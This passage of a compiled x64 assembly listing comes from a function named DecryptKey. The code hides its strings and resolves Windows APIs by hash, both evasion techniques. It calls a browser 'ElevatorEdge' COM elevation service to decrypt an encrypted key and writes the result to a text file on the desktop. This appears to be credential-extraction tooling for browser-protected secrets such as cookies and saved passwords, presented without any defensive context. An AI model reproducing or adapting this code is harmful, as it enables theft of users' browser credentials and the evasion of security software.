	mov	rcx, QWORD PTR keyPointer$[rsp]
	call	?Base64Decode@@YAPEADPEBDAEAH@Z		; Base64Decode
	mov	QWORD PTR encKey$[rsp], rax
; Line 249
	mov	BYTE PTR sOleAut32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOleAut32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOleAut32$[rsp+3], 65		; 00000041H
	mov	BYTE PTR sOleAut32$[rsp+4], 117		; 00000075H
	mov	BYTE PTR sOleAut32$[rsp+5], 116		; 00000074H
	mov	BYTE PTR sOleAut32$[rsp+6], 51		; 00000033H
	mov	BYTE PTR sOleAut32$[rsp+7], 50		; 00000032H
	mov	BYTE PTR sOleAut32$[rsp+8], 46		; 0000002eH
	mov	BYTE PTR sOleAut32$[rsp+9], 100		; 00000064H
	mov	BYTE PTR sOleAut32$[rsp+10], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+11], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+12], 0
; Line 250
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv577[rsp], rax
	lea	rcx, QWORD PTR sOleAut32$[rsp]
	call	QWORD PTR tv577[rsp]
	mov	QWORD PTR hOleAut32$[rsp], rax
; Line 251
	cmp	QWORD PTR hOleAut32$[rsp], 0
	jne	SHORT $LN25@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN25@DecryptKey:
; Line 254
	mov	DWORD PTR hashSysAllocStringByteLen$[rsp], -985302606 ; c54579b2H
; Line 255
	mov	r8d, -985302606				; c54579b2H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysAllocStringByteLen$[rsp], rax
; Line 256
	cmp	QWORD PTR pSysAllocStringByteLen$[rsp], 0
	jne	SHORT $LN26@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN26@DecryptKey:
; Line 259
	mov	DWORD PTR hashSysStringByteLen$[rsp], 1739000677 ; 67a70b65H
; Line 260
	mov	r8d, 1739000677				; 67a70b65H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysStringByteLen$[rsp], rax
; Line 261
	cmp	QWORD PTR pSysStringByteLen$[rsp], 0
	jne	SHORT $LN27@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN27@DecryptKey:
; Line 264
	mov	DWORD PTR hashSysFreeString$[rsp], 2140232812 ; 7f915c6cH
; Line 265
	mov	r8d, 2140232812				; 7f915c6cH
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysFreeString$[rsp], rax
; Line 266
	cmp	QWORD PTR pSysFreeString$[rsp], 0
	jne	SHORT $LN28@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN28@DecryptKey:
; Line 267
	mov	rax, QWORD PTR pSysAllocStringByteLen$[rsp]
	mov	QWORD PTR tv600[rsp], rax
	mov	eax, DWORD PTR length$[rsp]
	sub	eax, 4
	mov	rcx, QWORD PTR encKey$[rsp]
	add	rcx, 4
	mov	edx, eax
	call	QWORD PTR tv600[rsp]
	mov	QWORD PTR bstrEncKey$[rsp], rax
; Line 268
	mov	rax, QWORD PTR pElevatorEdge$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rax, QWORD PTR [rax+64]
	mov	QWORD PTR tv609[rsp], rax
	lea	r9, QWORD PTR dwLastError$[rsp]
	lea	r8, QWORD PTR decryptedDataBSTR$[rsp]
	mov	rdx, QWORD PTR bstrEncKey$[rsp]
	mov	rcx, QWORD PTR pElevatorEdge$[rsp]
	call	QWORD PTR tv609[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 269
	cmp	QWORD PTR bstrEncKey$[rsp], 0
	je	SHORT $LN29@DecryptKey
; Line 270
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv613[rsp], rax
	mov	rcx, QWORD PTR bstrEncKey$[rsp]
	call	QWORD PTR tv613[rsp]
	npad	1
$LN29@DecryptKey:
; Line 273
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN30@DecryptKey
; Line 274
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
; Line 275
	jmp	$LN31@DecryptKey
$LN30@DecryptKey:
; Line 284
	mov	DWORD PTR hashWriteFile$5[rsp], -339353823 ; ebc5df21H
; Line 285
	mov	r8d, -339353823				; ebc5df21H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pWriteFile$3[rsp], rax
; Line 286
	cmp	QWORD PTR pWriteFile$3[rsp], 0
	jne	SHORT $LN32@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN32@DecryptKey:
; Line 288
	mov	BYTE PTR path$2[rsp], 67		; 00000043H
	mov	BYTE PTR path$2[rsp+1], 58		; 0000003aH
	mov	BYTE PTR path$2[rsp+2], 92		; 0000005cH
	mov	BYTE PTR path$2[rsp+3], 85		; 00000055H
	mov	BYTE PTR path$2[rsp+4], 115		; 00000073H
	mov	BYTE PTR path$2[rsp+5], 101		; 00000065H
	mov	BYTE PTR path$2[rsp+6], 114		; 00000072H
	mov	BYTE PTR path$2[rsp+7], 115		; 00000073H
	mov	BYTE PTR path$2[rsp+8], 92		; 0000005cH
	mov	BYTE PTR path$2[rsp+9], 97		; 00000061H
	mov	BYTE PTR path$2[rsp+10], 100		; 00000064H
	mov	BYTE PTR path$2[rsp+11], 109		; 0000006dH
	mov	BYTE PTR path$2[rsp+12], 105		; 00000069H
	mov	BYTE PTR path$2[rsp+13], 110		; 0000006eH
	mov	BYTE PTR path$2[rsp+14], 92		; 0000005cH
	mov	BYTE PTR path$2[rsp+15], 68		; 00000044H
	mov	BYTE PTR path$2[rsp+16], 101		; 00000065H
	mov	BYTE PTR path$2[rsp+17], 115		; 00000073H
	mov	BYTE PTR path$2[rsp+18], 107		; 0000006bH
	mov	BYTE PTR path$2[rsp+19], 116		; 00000074H
	mov	BYTE PTR path$2[rsp+20], 111		; 0000006fH
	mov	BYTE PTR path$2[rsp+21], 112		; 00000070H
	mov	BYTE PTR path$2[rsp+22], 92		; 0000005cH
	mov	BYTE PTR path$2[rsp+23], 100		; 00000064H
	mov	BYTE PTR path$2[rsp+24], 101		; 00000065H
	mov	BYTE PTR path$2[rsp+25], 99		; 00000063H
	mov	BYTE PTR path$2[rsp+26], 114		; 00000072H
	mov	BYTE PTR path$2[rsp+27], 121		; 00000079H
	mov	BYTE PTR path$2[rsp+28], 112		; 00000070H
	mov	BYTE PTR path$2[rsp+29], 116		; 00000074H
	mov	BYTE PTR path$2[rsp+30], 101		; 00000065H
	mov	BYTE PTR path$2[rsp+31], 100		; 00000064H
	mov	BYTE PTR path$2[rsp+32], 95		; 0000005fH
	mov	BYTE PTR path$2[rsp+33], 107		; 0000006bH
	mov	BYTE PTR path$2[rsp+34], 101		; 00000065H
	mov	BYTE PTR path$2[rsp+35], 121		; 00000079H
	mov	BYTE PTR path$2[rsp+36], 46		; 0000002eH
	mov	BYTE PTR path$2[rsp+37], 116		; 00000074H
	mov	BYTE PTR path$2[rsp+38], 120		; 00000078H
	mov	BYTE PTR path$2[rsp+39], 116		; 00000074H
	mov	BYTE PTR path$2[rsp+40], 0
; Line 289
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv629[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 2
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 1073741824				; 40000000H
	lea	rcx, QWORD PTR path$2[rsp]
	call	QWORD PTR tv629[rsp]
	mov	QWORD PTR hFile$4[rsp], rax
; Line 290
	mov	rax, QWORD PTR pWriteFile$3[rsp]
	mov	QWORD PTR tv741[rsp], rax
	mov	rax, QWORD PTR pSysStringByteLen$[rsp]
	mov	QWORD PTR tv636[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv636[rsp]
	mov	DWORD PTR tv739[rsp], eax
	mov	rax, QWORD PTR decryptedDataBSTR$[rsp]
	mov	QWORD PTR tv737[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR tv739[rsp]
	mov	rdx, QWORD PTR tv737[rsp]
	mov	rcx, QWORD PTR hFile$4[rsp]
	call	QWORD PTR tv741[rsp]
; Line 291
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv743[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv743[rsp]
; Line 292
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv747[rsp], rax
	mov	rcx, QWORD PTR hFile$4[rsp]
	call	QWORD PTR tv747[rsp]
	npad	1
$LN31@DecryptKey:
; Line 294
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
$LN1@DecryptKey:
	add	rsp, 1088				; 00000440H
	pop	rdi
	ret	0
?DecryptKey@@YAXXZ ENDP					; DecryptKey
_TEXT	ENDS
END
